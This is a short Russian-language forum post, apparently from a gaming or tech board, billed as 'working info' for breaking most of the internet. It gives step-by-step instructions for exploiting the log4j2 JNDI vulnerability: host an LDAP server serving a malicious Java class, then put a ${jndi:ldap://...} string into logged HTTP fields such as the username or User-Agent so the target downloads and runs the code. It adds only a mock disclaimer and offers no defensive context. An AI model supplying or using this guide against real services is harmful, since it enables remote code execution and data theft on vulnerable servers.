Как поломать 90% крупного интернета. рабочая инфа

avatar AMDkrolyan

104

0

AMDkrolyan

Пользователь

Регистрация: 21.04.2013

Сообщения: 7649

Рейтинг: 2908

AMDkrolyan

Регистрация: 21.04.2013

Сообщения: 7649

Рейтинг: 2908

Что надо:


1. Любой ldap сервер, гугли openldap, открытый на паблик интернет.

2. Небольшие знания джавы для работы с файловой системой и базами данных.

3. Написать класс в джава языке реализующий Interface LdapContext,который сходит в бд, считает что-то с фс и т.д.

4. Найти сервис, который гипотетически юзает либу log4j2 (99.99%) java app

5. Добавить в реквест строку, которая будет логироваться (юзернейм, юзер-агент, другие http хедеры).

Формат строки ${jndi:ldap://:тут имя сервера} (дальше путь, который просто вернет этот джава класс как респонс текст)




ТС не несет ответственность за юзеров и гайд, любые совпадения случайны


UPD: Источник https://www.lunasec.io/docs/blog/log4j-zero-day/